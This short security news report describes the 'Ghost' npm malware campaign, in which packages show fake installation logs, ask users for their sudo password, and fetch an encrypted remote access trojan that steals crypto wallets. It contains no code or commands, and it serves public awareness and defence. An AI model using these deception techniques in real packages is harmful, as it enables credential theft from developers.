A new malicious npm campaign, dubbed the “Ghost campaign,” has been identified by security researchers as using fake installation logs to hide malware activity. The attacks, discovered by ReversingLabs, involve malicious packages that mimic legitimate software installation processes while secretly downloading and executing malware designed to steal sensitive data and crypto wallets.
The campaign began in early February and includes several downloader-type packages that prompt users for their sudo password during installation, which is then used to run a remote access trojan on the victim’s system. Fake installation logs show messages about downloading dependencies, installation progress bars and delays to simulate real activity, but none of these actions take place.
The final payload is downloaded from external sources, including a Telegram channel and hidden web3 content, decrypted with a key retrieved online, and executed locally using the stolen sudo password. The final-stage malware is a remote access trojan capable of stealing crypto wallets and other sensitive data, with some versions including additional files to enhance data theft. according to ReversingLabs.